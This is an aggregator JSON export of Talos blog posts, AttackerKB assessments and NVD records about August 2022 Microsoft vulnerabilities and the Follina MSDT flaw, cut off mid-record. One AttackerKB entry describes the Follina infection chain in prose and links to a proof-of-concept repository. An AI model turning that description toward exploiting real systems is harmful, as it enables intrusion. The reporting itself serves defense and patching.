{"talosblog": [{"lastseen": "2022-08-11T18:12:01", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n_By Jon Munshaw. _\n\n[](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nEveryone seems to want to create the next \u201cNetflix\u201d of something. Xbox\u2019s Game Pass is the [\u201cNetflix of video games.\u201d](<https://www.techradar.com/news/xbox-game-pass-is-taking-a-feature-from-netflix>) Rent the Runway is a [\u201cNetflix of fashion\u201d](<https://www.huffpost.com/entry/netflix-for-fashion-my-ex_b_9630844>) where customers subscribe to a rotation of fancy clothes. \n\n \n\n\nAnd now threat actors are looking to be the \u201cNetflix of malware.\u201d All categories of malware have some sort of \"[as-a-service](<https://www.itgovernance.co.uk/cyber-security-as-a-service>)\" twist now. Some of the largest ransomware groups in the world [operate \u201cas a service,\u201d](<https://blog.talosintelligence.com/2021/06/talos-takes-ep-57-ransomware-as-service.html>) allowing smaller groups to pay a fee in exchange for using the larger group\u2019s tools. \n\n \n\n\nOur [latest report](<https://talosintelligence.com/resources/488>) on information-stealers points out that \u201cinfostealers as-a-service\" are growing in popularity, and our researchers also discovered a [new \u201cC2 as-a-service\" platform](<https://blog.talosintelligence.com/2022/08/dark-utilities.html>) where attackers can pay to have this third-party site act as their command and control. And like Netflix, this Dark Utilities site offers several other layers of tools and malware to choose from. 
This is a particularly scary trend to me because of how easy \u2014 relatively speaking \u2014 this makes it for anyone with a basic knowledge of computers to carry out a cyber attack. Netflix made it easy for people like my Grandma to find everything she needs in one place to watch anything from throwback shows like \u201cKnight Rider\u201d to the live action of \u201cShrek: The Musical\u201d and everything in between. \n\n \n\n\nHow much longer before anyone with access to the internet can log into a singular dark web site and surf for whatever they\u2019re in the mood for that day? As someone who has spent zero time on the actual dark web, this may already exist and I don\u2019t even know about it, but maybe a threat actor will one day be smart enough to make a website that looks as sleek as Netflix so you can scroll through suggestions and hand-pick the Redline information-stealer followed up by a relaxing evening of ransomware from Conti. \n\n \n\n\nWith everything going \u201cas a service\u201d it means I don\u2019t necessarily have to have the coding skills to create my own bespoke malware. So long as I have the cash, I could conceivably buy an out-of-the-box tool online and deploy it against whoever I want. \n\n \n\n\nThis is not necessarily as easy as picking a show on Netflix. But it\u2019s not a huge leap to look at the skills gap Netflix closes by allowing my Grandma to surf for any show she wants without having to scroll through cable channels or drive to the library to check out a DVD, and someone who knows how to use PowerShell being able to launch an \u201cas-a-service\" ransomware attack. \n\n \n\n\nI have no idea what the easy solution is here aside from all the traditional forms of detection and prevention we preach. Outside of direct law enforcement intervention, there are few ways to take these \u201cas a service\u201d platforms offline. 
Maybe that just means we need to start working on the \u201cNetflix of cybersecurity tools.\u201d \n\n\n \n\n## The one big thing \n\n> \n\n\nHistorically, cybercrime was considered white-collar criminal behavior perpetrated by those who were knowledgeable and turned bad. Now, technology has become such an integral part of our lives that [anyone with a smartphone and desire can get started in cybercrime](<https://blog.talosintelligence.com/2022/08/smalltime-cybercrime.html>). The growth of cryptocurrencies and associated anonymity, whether legitimate or not, has garnered the attention of criminals that formerly operated in traditional criminal enterprises and have now shifted to cybercrime and identity theft. New research from Talos indicates that small-time criminals are increasingly taking part in online crime like phishing, credit card scams and more instead of traditional \u201chands-on\u201d crime. \n\n\n> ### Why do I care? \n> \n> Everyone panics when the local news shows a graph with \u201cviolent crime\u201d increasing in our respective areas. So we should be just as worried about the increase in cybercrime over the past few years, and the potential for it to grow. As mentioned above, \u201cas a service\u201d malware offerings have made it easier for anyone with internet access to carry out a cyber attack and deploy ransomware or just try to scam someone out of a few thousand dollars. \n> \n> ### So now what? \n> \n> Law enforcement, especially at the local level, is going to need to evolve along with the criminals as they are tasked with protecting the general public. The future criminal is going to be aware of operational security and technologies like Tor to make their arrests increasingly difficult. This is just as good a time as any to remember to talk to your family about cybersecurity and internet safety. 
Remind family members about common types of scams like the classic \u201cI\u2019m in the hospital and need money.\u201d \n\n> \n> \n\n## Other news of note\n\n \n\n\nMicrosoft Patch Tuesday was headlined by another zero-day vulnerability in the Microsoft Support Diagnostics Tool (MSDT). CVE-2022-35743 and CVE-2022-34713 are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild and Microsoft considers it \u201cmore likely\u201d to be exploited. MSDT was already the target of the so-called \u201cFollina\u201d zero-day vulnerability in June. In all, Microsoft patched more than 120 vulnerabilities across all its products. Adobe also released updates to fix 25 vulnerabilities on Tuesday, mainly in Adobe Acrobat Reader. One critical vulnerability could lead to arbitrary code execution and memory leak. ([Talos blog](<https://blog.talosintelligence.com/2022/08/microsoft-patch-tuesday-for-august-2022.html>), [Krebs on Security](<https://krebsonsecurity.com/2022/08/microsoft-patch-tuesday-august-2022-edition/>), [SecurityWeek](<https://www.securityweek.com/adobe-patch-tuesday-code-execution-flaws-acrobat-reader>)) \n\nSome of the U.K.\u2019s 111 services were disrupted earlier this week after a suspected cyber attack against its managed service provider. The country\u2019s National Health System warned residents that some emergency calls could be delayed and others could not schedule health appointments. Advance, the target of the attack, said it was investigating the potential theft of patient data. 
As of Thursday morning, at least nine NHS mental health trusts could face up to three weeks without access to vulnerable patients\u2019 records, though the incident has been \u201ccontained.\u201d ([SC Magazine](<https://www.scmagazine.com/analysis/business-continuity/cyberattack-disrupts-emergency-services-in-uk-drives-calls-for-healthcare-continuity>), [Bloomberg](<https://www.bloomberg.com/news/articles/2022-08-06/cyber-attack-disrupts-nhs-111-emergency-line-in-uk-telegraph#xj4y7vzkg>), [The Guardian](<https://www.theguardian.com/society/2022/aug/11/fears-patient-data-ransomware-attack-nhs-software-supplier>)) \n\nAn 18-year-old and her mother are facing charges in Nebraska over an alleged medicated abortion based on information obtained from Facebook messages. Court records indicate state law enforcement submitted a search warrant to Meta, the parent company of Facebook, demanding all private data, including messages, that the company had for the two people charged. The contents of those messages were then used as the basis of a second search warrant, in which additional computers and devices were confiscated. Although the investigation began before the U.S. Supreme Court\u2019s reversal of Roe v. Wade, the case highlights a renewed focus on digital privacy and data storage. ([Vice](<https://www.vice.com/en/article/n7zevd/this-is-the-data-facebook-gave-police-to-prosecute-a-teenager-for-abortion>), [CNN](<https://www.cnn.com/2022/08/10/tech/teen-charged-abortion-facebook-messages/index.html>)) \n\n## Can\u2019t get enough Talos? \n\n * * _[DarkReading News Desk at BlackHat](<https://youtu.be/L8wum8NuJAM?t=12719>)_\n * _[Talos Takes Ep. #107: Infostealers 101](<https://talosintelligence.com/podcasts/shows/talos_takes/episodes/107>)_\n * _[Threat Roundup for July 29 - Aug. 
5](<https://blog.talosintelligence.com/2022/08/threat-roundup-0729-0805.html>)_\n * _[How cybercrime is going small time](<https://www.protocol.com/sponsored-content/how-cybercrime-is-going-small-time>)_\n * _[Dark Utilities C2 service gains traction among threat actors](<https://www.scmagazine.com/brief/threat-intelligence/dark-utilities-c2-service-gains-traction-among-threat-actors>)_\n\n \n\n\n## Upcoming events where you can find Talos \n\n \n\n\n**[USENIX Security '22](<https://www.usenix.org/conference/usenixsecurity22#registration>) (Aug. 10 - 12, 2022) **\n\nLas Vegas, Nevada \n\n**_ \n_**\n\n**[DEF CON](<https://defcon.org/>) (Aug. 11 - 14, 2022) **\n\nLas Vegas, Nevada \n\n**_ \n_**\n\n**[Security Insights 101 Knowledge Series](<https://aavar.org/securityinsights101/>) (Aug. 25, 2022) **\n\nVirtual \n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645](<https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details>) ** **\n\n**MD5: **2c8ea737a232fd03ab80db672d50a17a \n\n**Typical Filename:** LwssPlayer.scr \n\n**Claimed Product: **\u68a6\u60f3\u4e4b\u5dc5\u5e7b\u706f\u64ad\u653e\u5668 \n\n**Detection Name: **Auto.125E12.241442.in02 \n\n \n\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>) ** **\n\n**MD5:** a087b2e6ec57b08c0d0750c60f96a74c \n\n**Typical Filename: 
**AAct.exe ** **\n\n**Claimed Product:** N/A ** **\n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201** **\n\n \n\n\n**SHA 256: **[c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0](<https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0/details>)** **\n\n**MD5: **8c69830a50fb85d8a794fa46643493b2** **\n\n**Typical Filename: **AAct.exe** **\n\n**Claimed Product: **N/A \n\n**Detection Name: **PUA.Win.Dropper.Generic::1201 \n\n** \n**\n\n**SHA 256: **[168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0](<https://www.virustotal.com/gui/file/168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0/details>) ** **\n\n**MD5: **311d64e4892f75019ee257b8377c723e \n\n**Typical Filename: **ultrasurf-21-32.exe \n\n**Claimed Product: **N/A** **\n\n**Detection Name: **W32.DFC.MalParent", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-11T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Aug. 11, 2022) \u2014 All of the things-as-a-service", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-11T18:00:00", "id": "TALOSBLOG:A956D5C24762AE2DD21C63305475F8AB", "href": "http://blog.talosintelligence.com/2022/08/threat-source-newsletter-aug-11-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-02T23:58:44", "description": "A recently discovered zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. 
CVE-2022-30190, also known under the name \"Follina,\" exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft... ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T14:53:52", "type": "talosblog", "title": "Threat Advisory: Zero-day vulnerability in Microsoft diagnostic tool MSDT could lead to code execution", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-02T14:53:52", "id": "TALOSBLOG:DE5281D9A4A03E4FA1F2A0B62B527489", "href": "http://blog.talosintelligence.com/2022/06/msdt-follina-coverage.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T16:58:32", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIxoLWRMhadA-_KYScFgU4r2bphbJQie1KMf5HidfCLhMK1eYN333LxM5v_EiExr0ojMt17sBFFPh4XhavE7u02EWHwd-vEkfU45UgMTDaBEdUUf9mR6_ZRuaGkrOXoRMEBSmlFYTE1F8n0wrdRBy8pN7IFwoy1K7YHKYUTnGyiWeAxLeWfSTa2rCc/s1001/patch%20tuesday.jpg>)\n\n \n_ \n_\n\n_By Jon Munshaw 
and Vanja Svajcer._\n\nMicrosoft released its monthly security update Tuesday, disclosing more than 120 vulnerabilities across its line of products and software, the most in a single Patch Tuesday [in four months](<https://blog.talosintelligence.com/2022/04/microsoft-patch-tuesday-includes-most.html>). \n\nThis batch of updates also includes a fix for a new vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) that\u2019s actively being exploited in the wild, according to Microsoft. MSDT was already the target of the so-called [\u201cFollina\u201d zero-day vulnerability](<https://blog.talosintelligence.com/2022/06/msdt-follina-coverage.html>) in June. \n\nIn all, August\u2019s Patch Tuesday includes 15 critical vulnerabilities and a single low- and moderate-severity issue. The remainder is classified as \u201cimportant.\u201d \n\nTwo of the important vulnerabilities [CVE-2022-35743](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35743>) and [CVE-2022-34713](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34713>) are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild and Microsoft considers it \u201cmore likely\u201d to be exploited. \n\nMicrosoft Exchange Server contains two critical elevation of privilege vulnerabilities, [CVE-2022-21980](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21980>) and [CVE-2022-24477](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24477>). An attacker could exploit this vulnerability by tricking a target into visiting a malicious, attacker-hosted server or website. In addition to applying the patch released today, potentially affected users should enable Extended Protection on vulnerable versions of the server. \n\nThe Windows Point-to-Point Tunneling Protocol is also vulnerable to three critical vulnerabilities. 
Two of them, [CVE-2022-35744](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35744>) and [CVE-2022-30133](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30133>), could allow an attacker to execute remote code on an RAS server machine. The other, [CVE-2022-35747](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35747>), could lead to a denial-of-service condition. CVE-2022-35744 has a CVSS severity score of 9.8 out of 10, one of the highest-rated vulnerabilities this month. An attacker could exploit these vulnerabilities by communicating via Port 1723. Affected users can render these issues unexploitable by blocking that port, though it runs the risk of disrupting other legitimate communications. \n\nAnother critical code execution vulnerability, [CVE-2022-35804](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35804>), affects the SMB Client and Server and the way the protocol handles specific requests. An attacker could exploit this on the SMB Client by configuring a malicious SMBv3 server and tricking a user into connecting to it through a phishing link. It could also be exploited in the Server by sending specially crafted packets to the server. \n\nMicrosoft recommended that users block access to Port 445 to protect against the exploitation of CVE-2022-35804. However, only certain versions of Windows 11 are vulnerable to this issue. 
\n\nTalos would also like to highlight eight important vulnerabilities that Microsoft considers to be \u201cmore likely\u201d to be exploited: \n\n * [CVE-2022-34699](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34699>): Win32k elevation of privilege vulnerability \n * [CVE-2022-35748](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35748>): HTTP.sys denial-of-service vulnerability \n * [CVE-2022-35750](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35750>): Win32k elevation of privilege vulnerability \n * [CVE-2022-35751](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35751>): Windows Hyper-V elevation of privilege vulnerability \n * [CVE-2022-35755](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35755>): Windows print spooler elevation of privilege vulnerability \n * [CVE-2022-35756](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35756>): Windows Kerberos elevation of privilege vulnerability \n * [CVE-2022-35761](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35761>): Windows Kernel elevation of privilege vulnerability \n * [CVE-2022-35793](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35793>): Windows Print Spooler elevation of privilege vulnerability \n\nA complete list of all the vulnerabilities Microsoft disclosed this month is available on its [update page](<https://portal.msrc.microsoft.com/en-us/security-guidance>). \n\nIn response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. 
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. \n\nThe rules included in this release that protect against the exploitation of many of these vulnerabilities are 60371 - 60380, 60382 - 60384, 60386 and 60387. There are also Snort 3 rules 300233 - 300239.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T20:44:00", "type": "talosblog", "title": "Microsoft Patch Tuesday for August 2022 \u2014 Snort rules and prominent vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-21980", "CVE-2022-24477", "CVE-2022-30133", "CVE-2022-34699", "CVE-2022-34713", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35761", "CVE-2022-35793", "CVE-2022-35804"], "modified": "2022-08-10T15:09:15", "id": "TALOSBLOG:E9524F807CE78585C607B458809D0AD7", "href": "http://blog.talosintelligence.com/2022/08/microsoft-patch-tuesday-for-august-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-01-31T14:39:22", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-35743.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "attackerkb", "title": "CVE-2022-34713", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-09T00:00:00", "id": "AKB:06DA4012-8C8E-4534-A099-AE4F2449F9B3", "href": "https://attackerkb.com/topics/B3Zx5VDSPc/cve-2022-34713", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-27T07:58:25", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at May 31, 2022 12:56pm UTC reported:\n\nEDIT: This was a quick description, and while it is still accurate as far as I know, a Rapid7 evaluation with greater analysis has been published here: <https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>\n\nThis is a relatively new vulnerability in the Microsoft Support Diagnostic Tool Vulnerability, so it is likely more information will come out in the coming days. \nCurrently, as seen in the wild, this vulnerability is embedded in a Word document and likely distributed with a *.rar file. When the Word document is opened, it reaches out and downloads an HTML file which has a JS section to implement the ms-msdt (Microsoft Support Diagnostic Tool Vulnerability) protocol which is then coerced into launching a command. 
\nAs reported by Jake Williams in a thread here: <https://twitter.com/MalwareJake/status/1531019243411623939>, the command opens the accompanying `*.rar` file and pulls a base64 encoded `*.cab` file from it, then expands the *cab file and runs a file contained in the cab file called `rgb.exe` THIS FILENAME IS LIKELY MUTABLE, SO I DO NOT RECOMMEND POLICING FOR IT WITHOUT OTHER RULES. \nMicrosoft has already published mitigation techniques for this exploit: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/> \nUsers are required to delete a single registry key called `HKEY_CLASSES_ROOT\\ms-msdt` though there is little discussion about the side effects of this operation. In his thread, Jake Williams has verified that the removal of this key prevents execution of the embedded payload. \nFurther reading: \n<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e> \nUntested and unverified PoC: <https://github.com/chvancooten/follina.py/blob/main/follina.py> \n<https://www.scythe.io/library/breaking-follina-msdt-vulnerability>\n\nUPDATE: I adjusted the attacker value up in light of reports by Kevin Beaumont that if the attacker uses an RTF file as the host, then the exploit code will run just viewing the file in the preview pane with explorer.exe. 
(details here: <https://github.com/JMousqueton/PoC-CVE-2022-30190> and the above doublepulsar blog post)\n\nAssessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "attackerkb", "title": "CVE-2022-30190", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-02T00:00:00", "id": "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "href": "https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-08-15T21:09:17", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-35743.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T20:15:00", "type": "cve", "title": "CVE-2022-34713", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-12T17:32:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-34713", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-34713", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*"]}, {"lastseen": "2022-06-07T20:25:09", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T20:15:00", "type": "cve", "title": "CVE-2022-30190", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": 
